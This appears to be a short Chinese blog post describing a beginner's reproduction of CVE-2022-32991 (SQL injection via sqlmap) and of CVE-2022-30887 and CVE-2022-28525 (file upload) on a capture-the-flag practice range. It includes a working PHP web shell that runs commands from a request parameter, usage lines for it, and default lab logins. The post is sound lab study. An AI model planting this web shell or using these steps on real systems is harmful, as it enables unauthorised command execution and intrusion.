首页 > 其他分享 >初识春秋云镜靶场

初识春秋云镜靶场

时间:2022-11-26 20:13:11浏览次数:57  
标签:登录 云镜 然后 flag 初识 复现 靶场 上传

春秋云镜靶场 2022.11.26

这个靶场里面有很多CVE的漏洞,有免费的也有收费的(价格有点小贵),十分推荐大家去打一打这个靶场,去巩固自己的知识

这篇文章的话是我个人的思路笔记,所以十分简略,也没有贴图,我都是攻克后,在脑子里面将过程复现出来的所以很简略。

文章的末尾有一篇博客写的比较详细,我在做的时候,遇到不会的地方也会去看看。大家可以多学习学习。

CVE-2022-32991

这个复现比较简单。

该CMS的welcome.php中存在SQL注入攻击。

复现步骤

首先注册一个账号。然后登录进去。

然后用burp抓取数据包,将数据包内容保存在一个txt文件中,然后使用 sqlmap可以将flag跑出来。

CVE-2022-30887

这个复现过程思路还是比较简单,但是知识还是比较多的。

涉及到的操作有 信息搜集,社工,文件上传,命令执行,代码执行。。。。

复现过程

首先我们进入这个界面,发现没有注册模块。只有登录模块,这个时候就要去信息收集了。

收集到的 账号[email protected]

密码mayurik

成功登录。然后登录到上传药品(谷歌翻译是这样翻译的。。。英文不好)的地方

然后上传一个shell.php文件。

在里面写入下列代码

<?php 
if($_REQUEST['m']){
     
     system ($_REQUEST['m']);
}
else phpinfo();
 
?>

代码意思很简单,一个判断语句。

然后我们到上传文件的图片处,右击鼠标键。点击复制图片链接。然后访问。正常情况下是会显示phpinfo函数的内容。

然后我们在url后面对m的值进行输入。

首先我们ls一下

在后面加入?m=ls / 发现了flag r 然后 输入?m=cat flag/

成功得到 flag

CVE-2022-28525

这关和上一关差不多,都是任意文件上传漏洞,但是这个可以直接弱口令登录

账号 admin

密码 admin

复现过程

我们弱口令登录进去以后,然后找到编辑头像的地方,对头像进行修改。这里还是直接上传前面的shell.php内容

然后访问图片地址。显示phpinfo函数界面就是正常的。

下面就是对m进行赋值,首先 ls 发现flag 然后cat flag

成功找到flag

今天是第一次对漏洞进行复现,好多内容也不是一次就成功复现成功的,还是查了一些资料,以及一些师傅的WP

优质文章推荐

https://blog.csdn.net/xy404/article/details/127310176

标签:登录,云镜,然后,flag,初识,复现,靶场,上传
From: https://www.cnblogs.com/Nige-W/p/16928170.html

相关文章

  • 红队渗透靶场之Jarbas靶场(超详细!)
    靶场考察点1.Jenkis平台的漏洞利用Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进......
  • 学习 vue3 第一天 vue3简介,创建vue3项目 Composition Api 初识
    前言:从今天开始来和大家一起学习vue3相信大家都不陌生,已经火了一段时间了,但是还是有不少人没有学习,那就跟着六扇老师来简单的入个门废话不多说,来开始今天的学习Vue3......
  • Django项目-001 初识Django
    1.django安装终端执行pip3.6installdjango终端执行进入某个目录(自定义),用于存放项目cd/dD:\new_learnPython环境C:\Python3.6.6\Scripts放到......
  • 初识Mybatis
    什么是mybatisMyBatis是一款优秀的持久层框架支持自定义SQL、存储过程以及高级映射。MyBatis免除了几乎所有的JDBC代码以及设置参数和获取结果集的工作。MyBatis......
  • 红队渗透靶场之W1R3S靶场
    W1R3S考察知识nmap的基本使用目录爆破工具的使用CMS漏洞的利用Linux用户的简单提权W1R3S靶场搭建W1R3S靶场下载地址:https://download.vulnhub.com/w1r3s/w1r3s.......
  • 初识Python
    初识Pythonpython解释器Python解释器是一个计算机程序,用来翻译python代码,并提交给计算机执行功能:1.翻译代码到二进制2.提交给计算机运行\1.计算机只认识什么?0和1\2......
  • 爬虫初识
    爬虫初识爬虫介绍爬虫(spider)又称网络蜘蛛爬虫的本质目前所有的软件的原理都是基于http请求发送和获取数据的,如PC端的网页,移动端的app爬虫可以模拟发送http请求,从别......
  • 初识MYSQL
    目录:1、表2、数据库2.1数据库管理系统2.2数据库系统2.3DBMS的工作流程3、关系型数据库4、非关系型数据库5、关系型数据与非数据库的区别6、mysql7、......
  • VulnHub靶场渗透实战8-DarkHole: 2
    靶场地址:DarkHole:2~VulnHubDescriptionBacktotheTopDifficulty:HardThisworksbetterwithVMwareratherthanVirtualBoxHint:Don'twasteyourtimeForB......
  • Vue 初识
    官方地址地址:https://cn.vuejs.org/安装Vue库地址:https://v2.cn.vuejs.org/v2/guide/installation.html 安装浏览器调试工具 另外一种方式安装Vue-devtools......